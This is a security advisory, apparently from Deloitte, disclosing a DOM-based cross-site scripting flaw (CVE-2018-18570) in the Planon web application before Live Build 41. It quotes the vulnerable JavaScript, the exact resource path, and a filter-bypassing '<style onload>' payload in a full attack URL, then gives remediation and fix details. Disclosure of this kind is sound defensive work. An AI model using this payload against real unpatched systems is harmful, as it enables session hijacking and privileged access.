Article

Cross-Site Scripting in Planon

A DOM Based Cross-Site Scripting vulnerability in Planon before Live Build 41 allows malicious users to inject JavaScript code in the DOM (Document Object Model), which is afterwards executed on the client side. It may be used by the attacker to steal privileged sessions on the web application and therefore gain high-privileged access. The vulnerability was reported as CVE-2018-18570.

Background

The Planon web application is vulnerable to DOM based Cross-Site Scripting (XSS). It is possible to inject JavaScript code in the DOM (Document Object Model), which gets executed on the client side.

Example of a location where DOM based XSS is possible: /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html

 

Steps to Reproduce

By inspecting the JavaScript code of the nodata.html file, we identified an unfiltered “nodatamsg” parameter:

var query = window.location.search.substring(1);
var parms = query.split('&');
var val = parms[i].substring(pos+1);
qsParm[key] = val;
var text = decodeURIComponent(qsParm['nodatamsg']);
document.getElementById('noDataToDisplayLabel').innerHTML = text;

An error message can therefore be displayed by calling the following URL:
/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=Test

As the <script> tag is filtered, we were not able to directly use a script command in the “nodatamsg” parameter. However, we were able to bypass the security mechanism with the following payload:
 

<style onload="alert('Deloitte XSS')"></style>

The final URL including the payload is therefore

/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=<style onload="alert('Deloitte XSS')"></style>

Root Cause

It is recommended that all user input on all pages is subject to rigorous sanitization routines before it is accepted by the application. More specifically, user input data validation should be performed on the server-side, as client-side validations can easily be bypassed.

 

Fix

The issue was fixed in Planon Live Build 41, released on January 10th 2019.

 

Credit

Credit for finding and reporting the issue:

Florian Otterbein

Verwandte Themen